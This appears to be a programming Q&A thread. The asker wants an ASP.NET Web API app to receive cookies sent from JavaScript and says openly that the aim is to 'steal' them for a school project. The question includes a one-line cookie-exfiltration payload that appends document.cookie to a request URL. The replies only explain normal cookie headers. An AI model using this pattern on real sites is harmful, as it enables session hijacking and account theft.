# Receiving a cookie with ASP.NET Web API

Tags: javascript, asp.net, api, cookies, request

I'm sending a cookie in JavaScript with a request like this:

```
https://localhost:1234/cookie=' + document.cookie
```

I wonder if there is a way to receive a cookie in Web API app (it's under localhost:1234). Any hints will be very appreciated. I'm new to web apps so please be understanding.

EDIT:  I don't wan't to use a cookie normally, I want to 'steal' it (don't worry, it's a project for school)

Answer (score 0):

> A cookie is a piece of data that a server sends in the HTTP response.
>   The client (optionally) stores the cookie and returns it on subsequet
>   requests. This allows the client and server to share state. To set a
>   cookie, the server includes a Set-Cookie header in the response. The
>   format of a cookie is a name-value pair, with optional attributes. For
>   example:
>
> Set-Cookie: session-id=1234567

Taken from [here](http://www.asp.net/web-api/overview/advanced/http-cookies).

Comment: This is how you use a cookie. I don't wan't to use a cookie normally, I want to 'steal' it (don't worry, it's a project for school).

Comment: @AbcXyz, the cookie belongs to the request header, so you need to set the request header. http://www.w3schools.com/js/js_cookies.asp

Comment: I have already done that. What I need to do now, is to access a cookie, which was sent in a request, in my ASP.NET app.